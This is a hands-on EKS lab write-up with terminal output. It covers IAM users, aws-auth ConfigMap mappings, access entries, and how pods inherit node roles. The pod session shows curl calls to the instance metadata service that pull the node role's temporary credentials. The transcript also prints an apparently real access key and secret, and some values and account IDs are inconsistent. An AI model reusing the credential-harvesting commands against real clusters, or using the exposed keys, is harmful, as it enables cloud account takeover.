(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws iam create-user --user-name testuser

{
"User": {
"Path": "/",
"UserName": "testuser",
"UserId": "AIDA2LU4OVCKXVBRCEGDT",
"Arn": "arn:aws:iam::712218945685:user/testuser",
"CreateDate": "2024-04-13T08:11:13+00:00"
}
}
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws iam create-access-key --user-name testuser
{
"AccessKey": {
"UserName": "testuser",
"AccessKeyId": "AKIA2LU4OVCKY6UBONWB",
"Status": "Active",
"SecretAccessKey": "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",
"CreateDate": "2024-04-13T08:14:44+00:00"
}
}
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name testuser

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::712218945685:root"

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl whoami
arn:aws:iam::712218945685:root

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws ec2 describe-instances --query "Reservations[*].Instances[*].{PublicIPAdd:PublicIpAddress,PrivateIPAdd:PrivateIpAddress,InstanceName:Tags[?Key=='Name']|[0].Value,Status:State.Name}" --filters Name=instance-state-name,Values=running --output table
-------------------------------------------------------------------------------------------
| DescribeInstances |
+------------------------------------------+----------------+-----------------+-----------+
| InstanceName | PrivateIPAdd | PublicIPAdd | Status |
+------------------------------------------+----------------+-----------------+-----------+
| sigridjin-ekscluster-240413-3-ng1-Node | 192.168.1.11 | 13.125.179.47 | running |
| sigridjin-ekscluster-240413-3-bastion-2 | 192.168.1.200 | 3.35.175.109 | running |
| sigridjin-ekscluster-240413-3-bastion | 192.168.1.100 | 43.203.181.160 | running |
| sigridjin-ekscluster-240413-3-ng1-Node | 192.168.2.154 | 3.37.29.245 | running |
| sigridjin-ekscluster-240413-3-ng1-Node | 192.168.3.122 | 3.37.128.191 | running |
+------------------------------------------+----------------+-----------------+-----------+

Step 2: [myeks-bastion-2] Set up and verify testuser credentials

  1. Configure the testuser credentials using aws configure and provide the AccessKeyID and SecretAccessKey obtained in step 1.2.
  2. Verify the caller identity using aws sts get-caller-identity --query Arn. If the user has no permissions, the command will fail.
  3. Confirm that the testuser is now visible in the IAM console.
  4. Attempt to use kubectl with kubectl get node -v6. It will fail because the ~/.kube/config file is missing, even though the testuser has AdministratorAccess permissions.
[root@sigridjin-ekscluster-240413-3-bastion-2 ~]# aws configure
AWS Access Key ID [None]: aws configure
AWS Secret Access Key [None]: asdf
Default region name [None]: ap-northeast-2
Default output format [None]: json
---
[root@sigridjin-ekscluster-240413-3-bastion-2 ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::712218945685:user/testuser"
---
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name testuser

[root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl get nodes -v6
I0413 17:26:51.247920 2457 round_trippers.go:553] GET http://localhost:8080/api?timeout=32s in 0 milliseconds
E0413 17:26:51.248015 2457 memcache.go:265] couldn't get current server API group list: Get "http://localhost:8080/api?timeout=32s": dial tcp 127.0.0.1:8080: connect: connection refused

[root@sigridjin-ekscluster-240413-3-bastion-2 ~]# ls ~/.kube
ls: cannot access /root/.kube: No such file or directory

Step 3: [myeks-bastion] Grant system:masters group permissions to testuser for EKS administrator-level access

Method 1: Use eksctl to create an IAM identity mapping. Run eksctl create iamidentitymapping --cluster $CLUSTER_NAME --username testuser --group system:masters --arn arn:aws:iam::$ACCOUNT_ID:user/testuser. This command writes to the aws-auth ConfigMap.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# eksctl create iamidentitymapping --cluster $CLUSTER_NAME --username testuser --group system:masters --arn arn:aws:iam::$ACCOUNT_ID:user/testuser
2024-04-13 17:47:31 [ℹ] checking arn arn:aws:iam::712218945685:user/testuser against entries in the auth ConfigMap
2024-04-13 17:47:31 [ℹ] adding identity "arn:aws:iam::712218945685:user/testuser" to auth ConfigMap

# 확인
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get cm -n kube-system aws-auth -o yaml | kubectl neat | yh
apiVersion: v1
data:
mapRoles: |
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
username: system:node:{{EC2PrivateDNSName}}
mapUsers: |
- groups:
- system:authenticated
userarn: arn:aws:iam::911283464785:user/testuser
username: testuser
- groups:
- system:masters
userarn: arn:aws:iam::712218945685:user/testuser
username: testuser
kind: ConfigMap
metadata:
name: aws-auth
namespace: kube-system
...

kubectl get validatingwebhookconfigurations eks-aws-auth-configmap-validation-webhook -o yaml | kubectl neat | yh

Method 2: Directly edit the aws-auth ConfigMap using kubectl edit cm -n kube-system aws-auth and add the testuser to the mapUsers section with the system:masters group.

kubectl edit cm aws-auth -n kube-system
---
apiVersion: v1
data:
mapRoles: |
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::911283464785:role/eksctl-myeks-nodegroup-ng1-NodeInstanceRole-LHQ7DWHQQRZJ
username: system:node:{{EC2PrivateDNSName}}
mapUsers: |
- groups:
- system:masters
userarn: arn:aws:iam::911283464785:user/testuser
username: testuser
---
apiVersion: v1
data:
mapRoles: |
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
username: system:node:{{EC2PrivateDNSName}}
mapUsers: | # map users 추가해보자
- groups:
- system:masters
userarn: arn:aws:iam::911283464785:user/testuser
username: testuser
kind: ConfigMap
metadata:
creationTimestamp: "2024-04-13T02:49:50Z"
name: aws-auth
namespace: kube-system
resourceVersion: "1566"
uid: 08a6ec8b-e334-4ad1-8039-e63c68553e7e
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
arn:aws:iam::911283464785:user/testuser testuser system:masters
  1. Verify the IAM identity mapping using eksctl get iamidentitymapping --cluster $CLUSTER_NAME.
  2. Understand the role of the existing role/eksctl-myeks-nodegroup-ng1-NodeInstanceRole-YYYYY.

Step 4: [myeks-bastion-2] Create testuser kubeconfig and verify kubectl usage

  1. Generate the kubeconfig for testuser using aws eks update-kubeconfig --name $CLUSTER_NAME --user-alias testuser. This is possible because testuser now has the system:masters permissions.
  2. Compare the generated ~/.kube/config with the one on the first bastion EC2.
  3. Verify kubectl usage with kubectl ns default and kubectl get node -v6.
  4. Install the rbac-tool using kubectl krew install rbac-tool and check the testuser's identity with kubectl rbac-tool whoami. Compare the output with the existing account.
[ec2-user@sigridjin-ekscluster-240413-3-bastion-2 ~]$ kubectl get node -v6
I0413 17:38:19.336348 2730 loader.go:395] Config loaded from file: /home/ec2-user/.kube/config
I0413 17:38:20.995501 2730 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api?timeout=32s 401 Unauthorized in 1658 milliseconds
E0413 17:38:20.996740 2730 memcache.go:265] couldn't get current server API group list: the server has asked for the client to provide credentials
I0413 17:38:20.996770 2730 cached_discovery.go:120] skipped caching discovery info due to the server has asked for the client to provide credentials
I0413 17:38:21.949170 2730 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api?timeout=32s 401 Unauthorized in 952 milliseconds
E0413 17:38:21.949597 2730 memcache.go:265] couldn't get current server API group list: the server has asked for the client to provide credentials
I0413 17:38:21.949631 2730 cached_discovery.go:120] skipped caching discovery info due to the server has asked for the client to provide credentials
I0413 17:38:21.949645 2730 shortcut.go:100] Error loading discovery information: the server has asked for the client to provide credentials
I0413 17:38:22.892015 2730 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api?timeout=32s 401 Unauthorized in 942 milliseconds
E0413 17:38:22.892907 2730 memcache.go:265] couldn't get current server API group list: the server has asked for the client to provide credentials
I0413 17:38:22.892927 2730 cached_discovery.go:120] skipped caching discovery info due to the server has asked for the client to provide credentials
I0413 17:38:23.875638 2730 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api?timeout=32s 401 Unauthorized in 982 milliseconds
E0413 17:38:23.875977 2730 memcache.go:265] couldn't get current server API group list: the server has asked for the client to provide credentials
I0413 17:38:23.875995 2730 cached_discovery.go:120] skipped caching discovery info due to the server has asked for the client to provide credentials
I0413 17:38:24.657330 2730 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api?timeout=32s 401 Unauthorized in 781 milliseconds
E0413 17:38:24.657651 2730 memcache.go:265] couldn't get current server API group list: the server has asked for the client to provide credentials
I0413 17:38:24.657672 2730 cached_discovery.go:120] skipped caching discovery info due to the server has asked for the client to provide credentials
I0413 17:38:24.657824 2730 helpers.go:246] server response object: [{
"metadata": {},
"status": "Failure",
"message": "the server has asked for the client to provide credentials",
"reason": "Unauthorized",
"details": {
"causes": [
{
"reason": "UnexpectedServerResponse",
"message": "unknown"
}
]
},
"code": 401
}]
error: You must be logged in to the server (the server has asked for the client to provide credentials)
[ec2-user@sigridjin-ekscluster-240413-3-bastion-2 ~]$ kubectl get node -v6
I0413 17:48:52.675473 3186 loader.go:395] Config loaded from file: /home/ec2-user/.kube/config
I0413 17:48:53.450493 3186 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api?timeout=32s 200 OK in 774 milliseconds
I0413 17:48:53.454494 3186 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/apis?timeout=32s 200 OK in 2 milliseconds
I0413 17:48:53.473353 3186 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api/v1/nodes?limit=500 200 OK in 6 milliseconds
NAME STATUS ROLES AGE VERSION
ip-192-168-1-11.ap-northeast-2.compute.internal Ready <none> 5h58m v1.28.5-eks-5e0fdde
ip-192-168-2-154.ap-northeast-2.compute.internal Ready <none> 5h58m v1.28.5-eks-5e0fdde
ip-192-168-3-122.ap-northeast-2.compute.internal Ready <none> 5h58m v1.28.5-eks-5e0fdde

[ec2-user@sigridjin-ekscluster-240413-3-bastion-2 ~]$ kubectl rbac-tool whoami
{Username: "testuser",
UID: "aws-iam-authenticator:712218945685:AIDA2LU4OVCKXVBRCEGDT",
Groups: ["system:masters",
"system:authenticated"],
Extra: {accessKeyId: ["AKIA2LU4OVCKY6UBONWB"],
arn: ["arn:aws:iam::712218945685:user/testuser"],
canonicalArn: ["arn:aws:iam::712218945685:user/testuser"],
principalId: ["AIDA2LU4OVCKXVBRCEGDT"],
sessionName: [""]}}

Step 5: Modifying the aws-auth ConfigMap

  • The aws-auth ConfigMap can be edited using the command kubectl edit cm -n kube-system aws-auth.
  • In the provided example, the ConfigMap is modified to change the testuser’s group from “system:masters” to “system:authenticated”.
  • This change is reflected in the mapUsers section of the ConfigMap, where the testuser's userarn is mapped to the "system:authenticated" group.
# kubectl edit cm -n kube-system aws-auth

apiVersion: v1
data:
mapRoles: |
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
username: system:node:{{EC2PrivateDNSName}}
mapUsers: |
- groups:
- system:authenticated
userarn: arn:aws:iam::911283464785:user/testuser
username: testuser
kind: ConfigMap
metadata:
creationTimestamp: "2024-04-13T02:49:50Z"
name: aws-auth
namespace: kube-system
resourceVersion: "82097"
uid: 08a6ec8b-e334-4ad1-8039-e63c68553e7e

# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
arn:aws:iam::712218945685:user/testuser testuser system:authenticated

Step 6: Testing Permissions on myeks-bastion-2

  • After modifying the aws-auth ConfigMap on the bastion host (myeks-bastion), the testuser’s permissions are tested on myeks-bastion-2.
  • Since the testuser’s group has been changed to “system:authenticated”, certain commands like kubectl get nodes no longer work due to insufficient permissions.
  • However, the testuser can still execute commands like kubectl api-resources, which lists the available API resources in the cluster.
[ec2-user@sigridjin-ekscluster-240413-3-bastion-2 ~]$ kubectl api-resources
NAME SHORTNAMES APIVERSION NAMESPACED KIND
bindings v1 true Binding
componentstatuses cs v1 false ComponentStatus
configmaps cm v1 true ConfigMap
endpoints ep v1 true Endpoints
events ev v1 true Event
limitranges limits v1 true LimitRange

Step 7: Deleting IAM Mapping on myeks-bastion

  • On the myeks-bastion host, the IAM mapping for the testuser is deleted using the command eksctl delete iamidentitymapping.
  • After deleting the IAM mapping, the testuser’s access to the cluster is further restricted.
  • The testuser can no longer execute commands like kubectl api-resources, indicating a complete revocation of permissions.
eksctl delete iamidentitymapping --cluster $CLUSTER_NAME --arn  arn:aws:iam::$ACCOUNT_ID:user/testuser
eksctl get iamidentitymapping --cluster $CLUSTER_NAME
kubectl get cm -n kube-system aws-auth -o yaml | yh

Practice: A deep dive into simplified Amazon EKS access management controls

1. Checking the mapRoles for nodes:

  • The command for node in $N1 $N2 $N3; do ssh ec2-user@$node aws sts get-caller-identity --query Arn; done is used to retrieve the IAM role ARN associated with each node.
  • The output shows that the nodes are assuming the role eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR with their respective instance IDs.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# for node in $N1 $N2 $N3; do ssh ec2-user@$node aws sts get-caller-identity --query Arn; done

"arn:aws:sts::712218945685:assumed-role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR/i-08eab2d8a5919161d"
"arn:aws:sts::712218945685:assumed-role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR/i-05b1286bbe75f7de3"
"arn:aws:sts::712218945685:assumed-role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR/i-0a9e63d090f9d4c18"

2. Examining the aws-auth ConfigMap:

  • The command `kubectl describe configmap -n kube-system aws-auth` is used to describe the aws-auth ConfigMap.
  • The output reveals that the role "eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR" is mapped to the groups "system:bootstrappers" and "system:nodes".
  • The command `eksctl get iamidentitymapping --cluster $CLUSTER_NAME` is used to get the IAM identity mapping for the cluster.
  • It confirms that the role is mapped to the username "system:node:{{EC2PrivateDNSName}}" and the groups "system:bootstrappers" and "system:nodes".
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl describe configmap -n kube-system aws-auth

Name: aws-auth
Namespace: kube-system
Labels: <none>
Annotations: <none>

Data
====
mapRoles:
----
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
username: system:node:{{EC2PrivateDNSName}}

mapUsers:
----
[]


BinaryData
====

Events: <none>

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes

Tip) Understanding the difference between "system:nodes" and "system:bootstrappers" groups:

- The "system:nodes" group is assigned to all nodes in the cluster and grants them permissions to communicate with the Kubernetes API server and perform necessary tasks within the cluster.

- The "system:bootstrappers" group is assigned to newly added nodes during the bootstrap process and grants them permissions to perform initial authentication and configuration.

- Once a node is successfully bootstrapped, it transitions from the "system:bootstrappers" group to the "system:nodes" group.

3. Creating an AWS CLI v2 pod for accessing EC2 Instance Metadata Service (IMDS):

  • A Deployment named "awscli-pod" is created using the provided YAML configuration.
  • The Deployment runs two replicas of a pod using the "amazon/aws-cli" image.
  • The command `kubectl get pod -owide` is used to retrieve information about the running pods, including their names and the nodes they are scheduled on.
  • The pod names are stored in the variables `APODNAME1` and `APODNAME2`.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# cat <<EOF | kubectl create -f -
> apiVersion: apps/v1
> kind: Deployment
> metadata:
> name: awscli-pod
> spec:
> replicas: 2
> selector:
> matchLabels:
> app: awscli-pod
> template:
> metadata:
> labels:
> app: awscli-pod
> spec:
> containers:
> - name: awscli-pod
> image: amazon/aws-cli
> command: ["tail"]
> args: ["-f", "/dev/null"]
> terminationGracePeriodSeconds: 0
> EOF
deployment.apps/awscli-pod created

-----
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod -owide

NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
awscli-pod-5bdb44b5bd-9bh97 1/1 Running 0 18s 192.168.3.158 ip-192-168-3-122.ap-northeast-2.compute.internal <none> <none>
awscli-pod-5bdb44b5bd-cmddg 1/1 Running 0 18s 192.168.2.145 ip-192-168-2-154.ap-northeast-2.compute.internal <none> <none>

-----
APODNAME1=$(kubectl get pod -l app=awscli-pod -o jsonpath={.items[0].metadata.name})
APODNAME2=$(kubectl get pod -l app=awscli-pod -o jsonpath={.items[1].metadata.name})
echo $APODNAME1, $APODNAME2

kubectl exec -it $APODNAME1 -- bash

4. Retrieving EC2 InstanceProfile (IAM Role) information from the awscli pods:

  • The command `kubectl exec -it $APODNAME1 -- aws sts get-caller-identity --query Arn` is used to retrieve the IAM role ARN associated with the first awscli pod.
  • The command `kubectl exec -it $APODNAME2 -- aws sts get-caller-identity --query Arn` is used to retrieve the IAM role ARN associated with the second awscli pod.
  • The output confirms that the pods are assuming the same IAM role as the nodes they are running on.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it $APODNAME1 -- aws sts get-caller-identity --query Arn
kubectl exec -it $APODNAME2 -- aws sts get-caller-identity --query Arn
"arn:aws:sts::712218945685:assumed-role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR/i-0a9e63d090f9d4c18"

6. Accessing AWS services from the awscli pods using the EC2 InstanceProfile (IAM Role):

  • The command `kubectl exec -it $APODNAME1 -- aws ec2 describe-instances --region ap-northeast-2 --output table --no-cli-pager` is used to describe EC2 instances using the IAM role associated with the first awscli pod.
  • The command `kubectl exec -it $APODNAME2 -- aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager` is used to describe VPCs using the IAM role associated with the second awscli pod.
  • These commands demonstrate that the pods can access AWS services using the IAM role of the node they are running on, without requiring separate IAM credentials.
kubectl exec -it $APODNAME1 -- aws ec2 describe-instances --region ap-northeast-2 --output table --no-cli-pager
kubectl exec -it $APODNAME2 -- aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager

7. Verifying EC2 metadata and retrieving IAM role information:

  • The command kubectl exec -it $APODNAME1 -- bash is used to enter a bash shell in the first awscli pod.
  • The IMDS is a service that provides metadata about the EC2 instance, including the IAM role associated with it. By default, any pod running on a node can access the IMDS and retrieve the IAM role information. This means that if a malicious actor gains access to a poorly secured container, they can potentially exploit the IMDS to obtain the IAM role associated with the node and gain unauthorized access to services.
  • To mitigate this risk, it is essential to follow the principle of least privilege. This means granting only the minimal permissions necessary for a pod or container to perform its intended functions. By carefully restricting the permissions associated with the IAM roles assigned to nodes, you can limit the potential impact of a compromised container.
kubectl exec -it $APODNAME1 -- bash
  • Inside the pod, the command curl -s http://169.254.169.254/ -v is used to retrieve the EC2 metadata.
  • The command curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" is used to obtain a token for accessing the EC2 Instance Metadata Service (IMDS) version 2.
  • The token is then used to retrieve the IAM role information using the command curl -s -H "X-aws-ec2-metadata-token: $TOKEN" –v http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR.
  • The output includes temporary security credentials (AccessKeyId, SecretAccessKey, and Token) that can be used to access AWS services until the specified expiration time.
bash-4.2# ls
curl -s http://169.254.169.254/ -v

bash-4.2# curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" ; echo
sadfafsd==

bash-4.2# curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" ; echo
dsfdsf==

bash-4.2# TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
bash-4.2# echo $TOKEN
asdfasdf

curl -s -H "X-aws-ec2-metadata-token: $TOKEN" –v http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
----------------------
{
"Code" : "Success",
"LastUpdated" : "2024-04-13T08:32:10Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "dfdfdfdf",
"SecretAccessKey" : "dffd/EgpZxGrV4f0vyrjjt9Zf6ccH",
"Token" : "IQoJb3JpZ2luX2VjEDkaDmFwLW5vcnRoZWFzdC0yIkcwRQIhAO1iqPVSb222Tr7irif1FbNnnC48XiO29GFLiQI9vgNaAiB4tsOOZZTWVuO9zLqsun+KYoEG/r18vUAIsvIDE5NTHirMBQhyEAEaDDcxMjIxODk0NTY4NSIMgm9YDn9JNpjZFE3uKqkFxgZxQ5FpCzdj/GIo8zbb+lW8ZRYaFVb5A43HJmp5sTQP7hqGJVTQ8qOzADpPszee87b8PcDZi3dgKk0uWO7v7sZvuNJ8MmUwhJw5oU/p887eJugBVJVwbFUGcgoaqqWGfWd7yY6tNs+MPcEsi20D//HAFm3NTG2KyWrkdpxl+jeNX8Tu7gluM7zzNY0BorRwmPM0YVpA2EGoMvi+f8UATcscI7uNmRwAVdOBGkHejycpjNJ0/JtTN++y0FwpX3usx0iEYhYn7kfJYUMEtCOMiqpXUCqV+cfUynvJAYdr00+lhv0jufAz8GOJI2QDhg1aNrq4jrdc+fxoWAaB6clzjwqtcAb2QGnuD0RBPwNzGF/XBqTtgM/PKOzyqOzQnvFw/lg5iJFbqZQ04GFriSXkZoUpLeG4vg4dMpxcWfV1n62UPAafavf7ofuwcQerOEuTQEzeqlchiOU7cSNyOEgmTYCvHFpCk7GQYwTIpahg3zTmB4nDBsUyhihaeV9wEe08xD7uc/qj/CiMnUozctpYFIZfgSyJzoZ2T+S9eYVgUOAUTLtaGLvSJ11aXe8sjWuuP8OTCH+LXP6/+09njxtHejojY9pyKp+fpQCRuFTEAtKn4rrkiOEX2b/pgZOPBDVBqLZGsyBg+i/XsM4BMjFKtkvfLf3ZmFdadsFRkqx8umnrWJkCAn4zUTm+ax3NOChr0Ll3ja8XW7jNxSfjeHBWg8tFsP3llgv3zvmdbx3tsneVyrqL8vbxdLNoSb4u0/mazxvDXHFOORt8gE4+5DXURTDukAaNyo9qT7A3yBgWdzI3eFNxvlpn0LPgHEjZE1PeT625fj7W3qgzaqdBo5a+JQGfOGF/Oe+cI5KntusEqR7JzRd4AOzB8ZFQGXchoiDdKgfJhFUFMKhiMOCF6bAGOrEBfOGgHy/78QlITIf+PR15VCzNlf52VhLY8rQxGplHPYMA/Q0R+OkCOw2Yz7PWJOzsJsjH+ofTjTG95WvcWoRiHAbDOWSHTSTbUGOgp3XqxjpGn/XNcYS2lgmLXMr6WMkOXdLbW3qDvhHIEDCdTqxVJ5UgFAgxSfdqF2E37HST3sSDqyb+fs55t5q/fqzMnK2Fe5YByXrc6HNwGDBbYaN8TQ4nFbGMnVAZsl/j3PNSRXvO",
"Expiration" : "2024-04-13T14:54:46Z"
}
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# export NODE_ROLE=eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
  user:
exec:
apiVersion: client.authentication.k8s.io/v1beta1
args:
- --region
- ap-northeast-2
- eks
- get-token
- --cluster-name
- sigridjin-ekscluster-240413-3
- --output
- json
- --role
- eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR

---
kubectl exec -it $APODNAME2 -- cat /root/.kube/config | yh

The command kubectl exec -it $APODNAME2 -- cat /root/.kube/config | yh is used to retrieve the kubeconfig file from the second awscli pod.

The kubeconfig file includes the mapRole information, specifying the IAM role ARN to be used for authentication. The IAM role and associated policies attached to the worker nodes can be verified in the AWS Management Console.

Practice 3: A deep dive into simplified Amazon EKS access management controls

When using EKS, you need to authenticate with both AWS and Kubernetes RBAC, which can be cumbersome.

Using EKS requires authentication from both AWS and Kubernetes RBAC, which can be cumbersome and inconvenient. This issue serves as the starting point for simplifying the authentication process.

Obtaining an AWS token:

  • When a user issues a Kubernetes command from their local machine, the kubectl command follows the kubeconfig settings on the user’s machine and sends a request to the EKS service endpoint using the get-token command.
  • The response includes a base64-encoded token, which is a pre-signed URL.

Authentication: kubectl → API Server

  • The kubectl command sends the bearer token along with the Kubernetes action to the API server.
  • The webhook verifies this token and performs the authentication process.
  • The authentication and authorization are not handled by the API server itself but are delegated to AWS IAM for verification.

Authentication: API Server → Webhook:

  • To enable the webhook to handle AWS IAM, the API server sends a request to the webhook, which returns the UserId and Role ARN.
  • At this point, the authentication is complete, and the AWS-Auth configuration map is used to map the authenticated user to Kubernetes users and groups for authorization.

Authentication: Webhook → AWS-Auth:

  • AWS-Auth is a configuration map that maps AWS IAM entities to Kubernetes users and groups.

Authorization

  • The API server receives the authenticated user, along with the mapped Kubernetes users and groups, and performs authorization using Kubernetes RBAC.

Step 1: Changing the EKS API access mode

  • Use the command aws eks update-cluster-config --name $CLUSTER_NAME --access-config authenticationMode=API to change the EKS API access mode.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks update-cluster-config --name $CLUSTER_NAME --access-config authenticationMode=API

{
"update": {
"id": "dcd3d6ac-f464-4397-b875-fc16856053b2",
"status": "InProgress",
"type": "AccessConfigUpdate",
"params": [
{
"type": "AuthenticationMode",
"value": "\"API\""
}
],
"createdAt": "2024-04-13T19:17:42.066000+09:00",
"errors": []
}
}

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get clusterroles -l 'kubernetes.io/bootstrapping=rbac-defaults' | grep -v 'system:'

NAME CREATED AT
admin 2024-04-13T02:41:20Z
cluster-admin 2024-04-13T02:41:20Z
edit 2024-04-13T02:41:20Z
view

kubectl describe clusterroles admin
kubectl describe clusterroles cluster-admin
kubectl describe clusterroles edit
kubectl describe clusterroles view 2024-04-13T02:41:20Z

Step 2: Listing supported access policies

  • Use the command aws eks list-access-policies | jq to list all access policies supported for managing cluster access.
  • The supported policies include AmazonEKSClusterAdminPolicy, AmazonEKSAdminPolicy, AmazonEKSEditPolicy, and AmazonEKSViewPolicy.

Step 3: Verifying mapped cluster roles

  • Use the command kubectl get clusterroles -l 'kubernetes.io/bootstrapping=rbac-defaults' | grep -v 'system:' to get the cluster roles mapped to the access policies.
  • The mapped cluster roles are admin, cluster-admin, edit, and view.
  • You can use kubectl describe clusterroles followed by the role name to view the details of each cluster role.

Step 4: Listing access entries and associated access policies

  • Use the command aws eks list-access-entries --cluster-name $CLUSTER_NAME | jq to list the access entries for the cluster.
  • Use aws eks list-associated-access-policies --cluster-name $CLUSTER_NAME --principal-arn <principal-arn> | jq to list the associated access policies for a specific principal.
  • Use aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn <principal-arn> | jq to describe the details of an access entry for a specific principal.
  • Current state: The testuser on Bastion2 does not have an associated IAM user or entry in the ConfigMap, which prevents them from successfully executing kubectl commands.
